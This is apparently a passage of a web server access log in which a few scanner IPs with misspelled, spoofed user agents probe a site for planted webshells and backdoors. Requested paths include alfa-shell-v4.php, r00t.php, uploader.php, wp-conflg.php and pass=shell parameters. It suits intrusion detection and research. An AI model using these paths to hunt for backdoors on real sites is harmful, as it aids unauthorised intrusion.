128.199.106.124 - - [12/Aug/2025:12:15:09 -0400] "GET /wp-content/themes/wp-pridmag/init.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:10 -0400] "GET /wp-content/themes/rishi/doc.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:14 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:17 -0400] "GET /wp-content/themes/rishi/db.php?u HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:24 -0400] "GET /wp-content/plugins/virr/v.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:27 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:28 -0400] "GET /wp-content/plugins/virr/uploader.php?uploader HTTP/1.1" 301 276 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:33 -0400] "GET /wp-content/plugins/db/uploader.php?uploader HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:38 -0400] "GET /wp-content/plugins/wp-freeform/wawe.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:42 -0400] "GET /wp-content/plugins/wp-freeform/includes/loadme.php HTTP/1.1" 301 281 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:51 -0400] "GET /wp-content/plugins/wp-freeform/style.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:52 -0400] "GET /?loadme HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:54 -0400] "GET /galekjaya.php?raimu=tgl99 HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:15:57 -0400] "GET /r00t.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:01 -0400] "GET /Xzd.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:02 -0400] "GET /radio.php?pass=shell HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:06 -0400] "GET /content.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:14 -0400] "GET /about.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:16:18 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:21 -0400] "GET /admin.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:25 -0400] "GET /css.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:27 -0400] "GET /doc.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:29 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:37 -0400] "GET /v.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:39 -0400] "GET /ups.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:44 -0400] "GET /up.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:49 -0400] "GET /fw.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:52 -0400] "GET /loader/ff.php?pass=shell HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:16:57 -0400] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:16:59 -0400] "GET /local.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:10 -0400] "GET /wp-atom.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:14 -0400] "GET /1index.php?pass=shell HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:23 -0400] "GET /2index.php?pass=shell HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:24 -0400] "GET /3index.php?f=NmRtJOUjAdutReQjscRjKUhleBpzmTyO.txt HTTP/1.1" 301 280 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:12:17:24 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:12:17:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:12:17:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:12:17:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:17:26 -0400] "GET /wikindex.php?f=NmRtJOUjAdutReQjscRjKUhleBpzmTyO.txt HTTP/1.1" 301 282 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:32 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:34 -0400] "GET /wp-conflg.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:36 -0400] "GET /wp-admin/includes/1975.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:43 -0400] "GET /wp-backup-sql-302.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:17:44 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:48 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:50 -0400] "GET /wp-inlcudes.php?katib HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:53 -0400] "GET /wp-js.php?phpshells HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:17:55 -0400] "GET /wp-load.php?daksldlkdsadas=1 HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:00 -0400] "GET /sys.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:03 -0400] "GET /0.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:04 -0400] "GET /0byte.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:06 -0400] "GET /0x0.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:12 -0400] "GET /0z.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:18 -0400] "GET /1.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:22 -0400] "GET /13.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:23 -0400] "GET /1877.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:24 -0400] "GET /1975.php?CVE=2022 HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:27 -0400] "GET /1975.php?CVE=2021 HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:29 -0400] "GET /1975.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:18:31 -0400] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:32 -0400] "GET /1975Team.php?shell=Dead HTTP/1.1" 301 254 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:34 -0400] "GET /403.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:18:42 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:18:43 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:18:46 -0400] "GET /wp-config-sample.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:48 -0400] "GET /404.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:18:50 -0400] "GET /wp-content/pm.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:53 -0400] "GET /45.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:18:54 -0400] "GET /.well-known/about.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:18:55 -0400] "GET /4x4.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:18:57 -0400] "GET /worm0.PhP7 HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:00 -0400] "GET /73.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:02 -0400] "GET /a.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:03 -0400] "GET /abc.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:08 -0400] "GET /al.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:11 -0400] "GET /alf.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:19 -0400] "GET /alf4.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:21 -0400] "GET /alfanew.PhP7 HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:25 -0400] "GET /gawean.PhP7 HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:26 -0400] "GET /alfa-ioxi.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:28 -0400] "GET /alfa-shell-v4.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:29 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:32 -0400] "GET /alfa.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:33 -0400] "GET /wp.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:35 -0400] "GET /alfakun.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:37 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:38 -0400] "GET /alfatesla.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:39 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:39 -0400] "GET /alfateslav4.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:45 -0400] "GET /fm1.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:19:46 -0400] "GET /alwso.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:19:49 -0400] "GET /alfadheat.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) 